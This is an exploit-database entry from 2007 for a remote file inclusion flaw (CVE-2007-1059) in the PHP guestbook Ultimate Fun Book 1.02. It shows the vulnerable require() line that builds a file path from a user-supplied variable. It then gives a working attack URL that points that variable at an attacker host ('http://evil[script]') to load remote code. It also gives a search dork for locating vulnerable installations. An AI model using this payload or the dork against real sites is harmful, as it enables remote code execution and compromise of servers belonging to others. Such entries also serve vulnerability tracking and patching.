Ultimate Fun Book 1.02 - 'function.php' Remote File Inclusion
Author: kezzap66345
type: webapps
platform: php
port:
date_added: 2007-02-19
date_updated:
verified: 1
codes: OSVDB-33305;CVE-2007-1059
tags:
aliases:
screenshot_url:
application_url:
****Ultimate Fun Book 1.02****
**found by:kezzap66345
**contant= [:(]
**download script=http://www.ultimate-fun-board.de
**dork:Ultimate-Fun-Book 1.02
file:
function.php
code:
<?php
require($gbpfad."/config.php");
exploit:
http://target/path/function.php?gbpfad=http://evil[script]
*********thanx= x0r0n,str0ke,shakia***********
*****************************************
# milw0rm.com [2007-02-20]